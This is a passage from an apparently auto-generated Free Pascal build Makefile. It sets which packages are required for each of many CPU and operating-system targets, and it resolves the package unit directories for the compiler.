REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),sparc-netbsd) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),sparc-solaris) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),sparc-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),x86_64-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),x86_64-freebsd) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),x86_64-haiku) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),x86_64-netbsd) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),x86_64-solaris) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),x86_64-openbsd) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),x86_64-darwin) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),x86_64-win64) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),x86_64-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 
endif ifeq ($(FULL_TARGET),x86_64-iphonesim) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),x86_64-android) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),x86_64-aros) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),x86_64-dragonfly) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),arm-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),arm-netbsd) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),arm-palmos) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),arm-wince) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),arm-gba) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),arm-nds) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),arm-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),arm-symbian) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),arm-android) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),arm-aros) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),arm-freertos) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),arm-ios) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),powerpc64-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),powerpc64-darwin) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 
REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),powerpc64-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),powerpc64-aix) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),avr-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),armeb-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),armeb-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),mips-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),mipsel-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),mipsel-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),mipsel-android) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),mips64el-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),jvm-java) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),jvm-android) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i8086-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i8086-msdos) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),i8086-win16) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),aarch64-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),aarch64-darwin) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),aarch64-win64) REQUIRE_PACKAGES_RTL=1 
REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),aarch64-android) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),aarch64-ios) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),wasm-wasm) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),sparc64-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),riscv32-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),riscv32-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),riscv64-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),riscv64-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),xtensa-linux) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),xtensa-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),xtensa-freertos) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),z80-embedded) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),z80-zxspectrum) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifeq ($(FULL_TARGET),z80-msxdos) REQUIRE_PACKAGES_RTL=1 REQUIRE_PACKAGES_PASZLIB=1 REQUIRE_PACKAGES_FCL-PROCESS=1 REQUIRE_PACKAGES_HASH=1 REQUIRE_PACKAGES_LIBTAR=1 REQUIRE_PACKAGES_FPMKUNIT=1 endif ifdef REQUIRE_PACKAGES_RTL PACKAGEDIR_RTL:=$(firstword $(subst /Makefile.fpc,,$(strip $(wildcard $(addsuffix /rtl/Makefile.fpc,$(PACKAGESDIR)))))) ifneq ($(PACKAGEDIR_RTL),) ifneq ($(wildcard $(PACKAGEDIR_RTL)/units/$(TARGETSUFFIX)),) UNITDIR_RTL=$(PACKAGEDIR_RTL)/units/$(TARGETSUFFIX) else UNITDIR_RTL=$(PACKAGEDIR_RTL) endif ifneq ($(wildcard $(PACKAGEDIR_RTL)/units/$(SOURCESUFFIX)),) UNITDIR_FPMAKE_RTL=$(PACKAGEDIR_RTL)/units/$(SOURCESUFFIX) else ifneq ($(wildcard $(PACKAGEDIR_RTL)/units_bs/$(SOURCESUFFIX)),) UNITDIR_FPMAKE_RTL=$(PACKAGEDIR_RTL)/units_bs/$(SOURCESUFFIX) else 
UNITDIR_FPMAKE_RTL=$(PACKAGEDIR_RTL) endif endif ifdef CHECKDEPEND $(PACKAGEDIR_RTL)/$(OS_TARGET)/$(FPCMADE): $(MAKE) -C $(PACKAGEDIR_RTL)/$(OS_TARGET) $(FPCMADE) override ALLDEPENDENCIES+=$(PACKAGEDIR_RTL)/$(OS_TARGET)/$(FPCMADE) endif else PACKAGEDIR_RTL= UNITDIR_RTL:=$(subst /Package.fpc,,$(strip $(wildcard $(addsuffix /rtl/Package.fpc,$(UNITSDIR))))) ifneq ($(UNITDIR_RTL),) UNITDIR_RTL:=$(firstword $(UNITDIR_RTL)) else UNITDIR_RTL= endif endif ifdef UNITDIR_RTL override COMPILER_UNITDIR+=$(UNITDIR_RTL) endif ifdef UNITDIR_FPMAKE_RTL override COMPILER_FPMAKE_UNITDIR+=$(UNITDIR_FPMAKE_RTL) endif endif ifdef REQUIRE_PACKAGES_PASZLIB PACKAGEDIR_PASZLIB:=$(firstword $(subst /Makefile.fpc,,$(strip $(wildcard $(addsuffix /paszlib/Makefile.fpc,$(PACKAGESDIR)))))) ifneq ($(PACKAGEDIR_PASZLIB),) ifneq ($(wildcard $(PACKAGEDIR_PASZLIB)/units/$(TARGETSUFFIX)),) UNITDIR_PASZLIB=$(PACKAGEDIR_PASZLIB)/units/$(TARGETSUFFIX) else UNITDIR_PASZLIB=$(PACKAGEDIR_PASZLIB) endif ifneq ($(wildcard $(PACKAGEDIR_PASZLIB)/units/$(SOURCESUFFIX)),) UNITDIR_FPMAKE_PASZLIB=$(PACKAGEDIR_PASZLIB)/units/$(SOURCESUFFIX) else ifneq ($(wildcard $(PACKAGEDIR_PASZLIB)/units_bs/$(SOURCESUFFIX)),) UNITDIR_FPMAKE_PASZLIB=$(PACKAGEDIR_PASZLIB)/units_bs/$(SOURCESUFFIX) else UNITDIR_FPMAKE_PASZLIB=$(PACKAGEDIR_PASZLIB) endif endif ifdef CHECKDEPEND $(PACKAGEDIR_PASZLIB)/$(FPCMADE): $(MAKE) -C $(PACKAGEDIR_PASZLIB) $(FPCMADE) override ALLDEPENDENCIES+=$(PACKAGEDIR_PASZLIB)/$(FPCMADE) endif else PACKAGEDIR_PASZLIB= UNITDIR_PASZLIB:=$(subst /Package.fpc,,$(strip $(wildcard $(addsuffix /paszlib/Package.fpc,$(UNITSDIR))))) ifneq ($(UNITDIR_PASZLIB),) UNITDIR_PASZLIB:=$(firstword $(UNITDIR_PASZLIB)) else UNITDIR_PASZLIB= endif endif ifdef UNITDIR_PASZLIB override COMPILER_UNITDIR+=$(UNITDIR_PASZLIB) endif ifdef UNITDIR_FPMAKE_PASZLIB override COMPILER_FPMAKE_UNITDIR+=$(UNITDIR_FPMAKE_PASZLIB) endif endif ifdef REQUIRE_PACKAGES_FCL-PROCESS PACKAGEDIR_FCL-PROCESS:=$(firstword $(subst /Makefile.fpc,,$(strip $(wildcard $(addsuffix /fcl-process/Makefile.fpc,$(PACKAGESDIR)))))) ifneq ($(PACKAGEDIR_FCL-PROCESS),) ifneq ($(wildcard $(PACKAGEDIR_FCL-PROCESS)/units/$(TARGETSUFFIX)),) UNITDIR_FCL-PROCESS=$(PACKAGEDIR_FCL-PROCESS)/units/$(TARGETSUFFIX) else UNITDIR_FCL-PROCESS=$(PACKAGEDIR_FCL-PROCESS) endif ifneq ($(wildcard $(PACKAGEDIR_FCL-PROCESS)/units/$(SOURCESUFFIX)),) UNITDIR_FPMAKE_FCL-PROCESS=$(PACKAGEDIR_FCL-PROCESS)/units/$(SOURCESUFFIX) else ifneq ($(wildcard $(PACKAGEDIR_FCL-PROCESS)/units_bs/$(SOURCESUFFIX)),) UNITDIR_FPMAKE_FCL-PROCESS=$(PACKAGEDIR_FCL-PROCESS)/units_bs/$(SOURCESUFFIX) else UNITDIR_FPMAKE_FCL-PROCESS=$(PACKAGEDIR_FCL-PROCESS) endif endif ifdef CHECKDEPEND $(PACKAGEDIR_FCL-PROCESS)/$(FPCMADE): $(MAKE) -C $(PACKAGEDIR_FCL-PROCESS) $(FPCMADE) override ALLDEPENDENCIES+=$(PACKAGEDIR_FCL-PROCESS)/$(FPCMADE) endif else PACKAGEDIR_FCL-PROCESS= UNITDIR_FCL-PROCESS:=$(subst /Package.fpc,,$(strip $(wildcard $(addsuffix /fcl-process/Package.fpc,$(UNITSDIR))))) ifneq ($(UNITDIR_FCL-PROCESS),) UNITDIR_FCL-PROCESS:=$(firstword $(UNITDIR_FCL-PROCESS)) else UNITDIR_FCL-PROCESS= endif endif ifdef UNITDIR_FCL-PROCESS override COMPILER_UNITDIR+=$(UNITDIR_FCL-PROCESS) endif ifdef UNITDIR_FPMAKE_FCL-PROCESS override COMPILER_FPMAKE_UNITDIR+=$(UNITDIR_FPMAKE_FCL-PROCESS) endif endif ifdef REQUIRE_PACKAGES_HASH PACKAGEDIR_HASH:=$(firstword $(subst /Makefile.fpc,,$(strip $(wildcard $(addsuffix /hash/Makefile.fpc,$(PACKAGESDIR)))))) ifneq ($(PACKAGEDIR_HASH),) ifneq ($(wildcard $(PACKAGEDIR_HASH)/units/$(TARGETSUFFIX)),) 
UNITDIR_HASH=$(PACKAGEDIR_HASH)/units/$(TARGETSUFFIX) else UNITDIR_HASH=$(PACKAGEDIR_HASH) endif ifneq ($(wildcard $(PACKAGEDIR_HASH)/units/$(SOURCESUFFIX)),) UNITDIR_FPMAKE_HASH=$(PACKAGEDIR_HASH)/units/$(SOURCESUFFIX) else ifneq ($(wildcard $(PACKAGEDIR_HASH)/units_bs/$(SOURCESUFFIX)),) UNITDIR_FPMAKE_HASH=$(PACKAGEDIR_HASH)/units_bs/$(SOURCESUFFIX) else UNITDIR_FPMAKE_HASH=$(PACKAGEDIR_HASH) endif endif ifdef CHECKDEPEND $(PACKAGEDIR_HASH)/$(FPCMADE): $(MAKE) -C $(PACKAGEDIR_HASH) $(FPCMADE) override ALLDEPENDENCIES+=$(PACKAGEDIR_HASH)/$(FPCMADE) endif else PACKAGEDIR_HASH= UNITDIR_HASH:=$(subst /Package.fpc,,$(strip $(wildcard $(addsuffix /hash/Package.fpc,$(UNITSDIR))))) ifneq ($(UNITDIR_HASH),) UNITDIR_HASH:=$(firstword $(UNITDIR_HASH)) else UNITDIR_HASH= endif endif ifdef UNITDIR_HASH override COMPILER_UNITDIR+=$(UNITDIR_HASH) endif ifdef UNITDIR_FPMAKE_HASH override COMPILER_FPMAKE_UNITDIR+=$(UNITDIR_FPMAKE_HASH) endif endif ifdef REQUIRE_PACKAGES_LIBTAR PACKAGEDIR_LIBTAR:=$(firstword $(subst /Makefile.fpc,,$(strip $(wildcard $(addsuffix /libtar/Makefile.fpc,$(PACKAGESDIR)))))) ifneq ($(PACKAGEDIR_LIBTAR),) ifneq ($(wildcard $(PACKAGEDIR_LIBTAR)/units/$(TARGETSUFFIX)),) UNITDIR_LIBTAR=$(PACKAGEDIR_LIBTAR)/units/$(TARGETSUFFIX) else UNITDIR_LIBTAR=$(PACKAGEDIR_LIBTAR) endif ifneq ($(wildcard $(PACKAGEDIR_LIBTAR)/units/$(SOURCESUFFIX)),) UNITDIR_FPMAKE_LIBTAR=$(PACKAGEDIR_LIBTAR)/units/$(SOURCESUFFIX) else ifneq ($(wildcard $(PACKAGEDIR_LIBTAR)/units_bs/$(SOURCESUFFIX)),) UNITDIR_FPMAKE_LIBTAR=$(PACKAGEDIR_LIBTAR)/units_bs/$(SOURCESUFFIX) else UNITDIR_FPMAKE_LIBTAR=$(PACKAGEDIR_LIBTAR) endif endif ifdef CHECKDEPEND $(PACKAGEDIR_LIBTAR)/$(FPCMADE): $(MAKE) -C $(PACKAGEDIR_LIBTAR) $(FPCMADE) override ALLDEPENDENCIES+=$(PACKAGEDIR_LIBTAR)/$(FPCMADE) endif else PACKAGEDIR_LIBTAR= UNITDIR_LIBTAR:=$(subst /Package.fpc,,$(strip $(wildcard $(addsuffix /libtar/Package.fpc,$(UNITSDIR))))) ifneq ($(UNITDIR_LIBTAR),) UNITDIR_LIBTAR:=$(firstword $(UNITDIR_LIBTAR)) else UNITDIR_LIBTAR= endif endif ifdef UNITDIR_LIBTAR override COMPILER_UNITDIR+=$(UNITDIR_LIBTAR) endif ifdef UNITDIR_FPMAKE_LIBTAR override COMPILER_FPMAKE_UNITDIR+=$(UNITDIR_FPMAKE_LIBTAR) endif endif ifdef REQUIRE_PACKAGES_FPMKUNIT PACKAGEDIR_FPMKUNIT:=$(firstword $(subst /Makefile.fpc,,$(strip $(wildcard $(addsuffix /fpmkunit/Makefile.fpc,$(PACKAGESDIR)))))) ifneq ($(PACKAGEDIR_FPMKUNIT),) ifneq ($(wildcard $(PACKAGEDIR_FPMKUNIT)/units/$(TARGETSUFFIX)),) 